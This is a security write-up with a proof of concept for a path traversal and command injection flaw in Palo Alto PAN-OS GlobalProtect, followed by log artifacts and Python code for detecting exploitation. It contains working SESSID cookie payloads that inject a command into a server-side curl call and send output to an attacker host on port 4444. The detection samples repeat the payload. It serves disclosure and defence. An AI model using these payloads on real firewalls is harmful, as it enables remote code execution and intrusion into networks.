Exploit and Detect Pan OS < 11.1 Command Injection

Pan OS < 11.1 Command Injection PoC and Artifacts

Author: André Eichhofer

Preconditions

There is a path traversal and command injection vulnerability in Palo Alto OS < 11.1 firewalls which leads to remote code execution. The application must be configured with a GlobalProtect gateway and telemetry must be enabled.

The vulnerability is caused by

  • improper input validation when parsing session IDs, which allows path traversal and the creation of a zero-byte file
  • improper sanitisation when a curl command is executed on the server side, which allows an attacker to craft an arbitrary command

The vulnerabilities can be exploited when the application copies telemetry data to a specific location on the file system.

Normal behavior of the application

┌────────────────────────────────────────────────────────────────┐ 
│                                                                │ 
│                          Application                           │ 
│                                                                │ 
└──────────────────────────────────────────────┬─────────────────┘ 
                                               │                   
                                               │                   
                                               │                   
                                               ▼                   
┌──────────────────────┐                                           
│ <directory_location> │   curl 'telemetry log files' to <directory_location> 
└──────────────────────┘                                           
            │                                                    ▲                   
            │                                                    │                   
            └────────────────────────────────────────────────────┘


Arbitrary file write

An attacker can send an HTTP request to a non-existing URL on the server with a malicious session ID parameter.

Example

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: hostname
Cookie: SESSID=foo_bar

The manipulated content is reflected in the server web logs like this:

... failed to load file /tmp/sslvpn/session_foo_bar

In addition, the SESSID parameter is prone to a path traversal vulnerability which allows writing an arbitrary zero-byte file to an arbitrary location.

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: hostname
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/test.txt;

Accessing the file under <host>/sslvpndocs/global-protect/portal/images/test.txt results in a 403 (rather than the 404 returned for a missing file), which proves that the file has been written.


Command injection

The application uses the curl command internally to copy log files from a temporary location to /opt/panlogs/tmp/device_telemetry/minute/ on the file system. This behaviour can be verified by inspecting the application log files:

Example application log file

24-04-16 02:28:05,060 dt INFO S2: XFILE: send_file: curl cmd: '/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT "<https://storage.googleapis.com/bulkreceiver-cdl-prd1-sg/telemetry/><SERIAL_NO>/2024/04/16/09/28//opt/panlogs/tmp/device_telemetry/minute/PA_<SERIAL_NO>_dt_11.1.2_20240416_0840_5-min-interval_MINUTE.tgz?GoogleAccessId=bulkreceiver-frontend-sg-prd@cdl-prd1-sg.iam.gserviceaccount.com&Expires=1713260285&Signature=<truncated>" --data-binary @/opt/panlogs/tmp/device_telemetry/minute/PA_<SERIAL_NO>_dt_11.1.2_20240416_0840_5-min-interval_MINUTE.tgz --capath /tmp/capath'

Now the vulnerable SESSID parameter can be used to write a string into the directory location which is used by curl:

Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere

The string is reflected in the curl shell command like this:

'/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT ... ... --data-binary @/opt/panlogs/tmp/device_telemetry/minute/hellothere

This makes it possible to craft an arbitrary command and append it to the curl shell command. To exploit this vulnerability you can open a web server on the attacker machine, e.g. python3 -m http.server 4444, and send a command over the SESSID parameter to the application:

Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere`curl${IFS}attacker:4444?user=$(whoami)`;

The command is concatenated internally into the curl shell command like this:

'/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT ... ... --data-binary @/opt/panlogs/tmp/device_telemetry/minute/hellothere`curl${IFS}attacker:4444?user=$(whoami)

The injected command runs and its output is sent to the web server on the attacker machine:

python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
<host_ip> - - "GET /?user=root HTTP/1.1" 200 -


Artifacts

You can check for exploitation attempts by reviewing the log data of the nginx web server and the application logs. Download and unzip the techsupport.tgz file.

  • PAN-OS application log file containing the telemetry data and the curl shell command: var/log/pan/device_telemetry_send.log -> check for unusual entries
  • Nginx log file: var/nginx/log/sslvpn_access.log -> check for unusual entries
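An added example (not part of the original write-up) of what "unusual entries" means for the two artifacts above: it flags curl commands in device_telemetry_send.log whose --data-binary file is not a well-formed telemetry archive, and session file paths in the sslvpn web log that leave /tmp/sslvpn/ or carry shell metacharacters. The sample log lines, their timestamp prefixes and the archive name pattern are constructed to mirror the entries quoted earlier and are assumptions.

```python
import posixpath
import re

# Constructed sample log lines (not from a real device). They mimic the "curl cmd:"
# entry in device_telemetry_send.log and the "failed to load file /tmp/sslvpn/session_<SESSID>"
# message in the sslvpn web log; the line prefixes are assumed.
TELEMETRY_LOG = """\
24-04-16 02:28:05,060 dt INFO S2: XFILE: send_file: curl cmd: '/usr/bin/curl -v -X PUT "https://example.invalid/upload" --data-binary @/opt/panlogs/tmp/device_telemetry/minute/PA_0000_dt_11.1.2_20240416_0840_5-min-interval_MINUTE.tgz --capath /tmp/capath'
24-04-16 02:33:05,101 dt INFO S2: XFILE: send_file: curl cmd: '/usr/bin/curl -v -X PUT "https://example.invalid/upload" --data-binary @/opt/panlogs/tmp/device_telemetry/minute/hellothere`curl${IFS}attacker:4444?user=$(whoami)` --capath /tmp/capath'
"""
SSLVPN_LOG = """\
2024/04/16 02:27:40 [error] failed to load file /tmp/sslvpn/session_a1b2c3d4
2024/04/16 02:27:55 [error] failed to load file /tmp/sslvpn/session_/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere
"""
TELEMETRY_DIR = "/opt/panlogs/tmp/device_telemetry/minute"
# Assumed shape of a legitimate archive: PA_<serial>_dt_<version>_<date>_<time>_<interval>.tgz
ARCHIVE_NAME = re.compile(r"^PA_[A-Za-z0-9]+_dt_[\w.]+_\d{8}_\d{4}_[\w-]+\.tgz$")
DATA_BINARY = re.compile(r"--data-binary @([^\s']+)")
SESSION_PATH = re.compile(r"/tmp/sslvpn/session_(\S+)")
SHELL_META = re.compile(r"[`;|&]|\$\(|\$\{")


def suspicious_telemetry_entries(log_text):
    """(line_no, path) for curl commands whose --data-binary file is not a
    well-formed telemetry archive sitting directly inside TELEMETRY_DIR."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = DATA_BINARY.search(line)
        if not m:
            continue
        path = m.group(1)
        directory, _, name = path.rpartition("/")
        if directory != TELEMETRY_DIR or SHELL_META.search(path) or not ARCHIVE_NAME.match(name):
            hits.append((n, path))
    return hits


def suspicious_session_ids(log_text):
    """(line_no, sessid) for web-log entries whose session file path escapes
    /tmp/sslvpn/ via traversal or carries shell metacharacters."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = SESSION_PATH.search(line)
        if not m:
            continue
        sessid = m.group(1)
        resolved = posixpath.normpath("/tmp/sslvpn/session_" + sessid)
        if ".." in sessid or not resolved.startswith("/tmp/sslvpn/") or SHELL_META.search(sessid):
            hits.append((n, sessid))
    return hits
```

Run both functions over the real files extracted from techsupport.tgz; the first sample line of each log is benign and is not reported, the second is.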


Links

https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/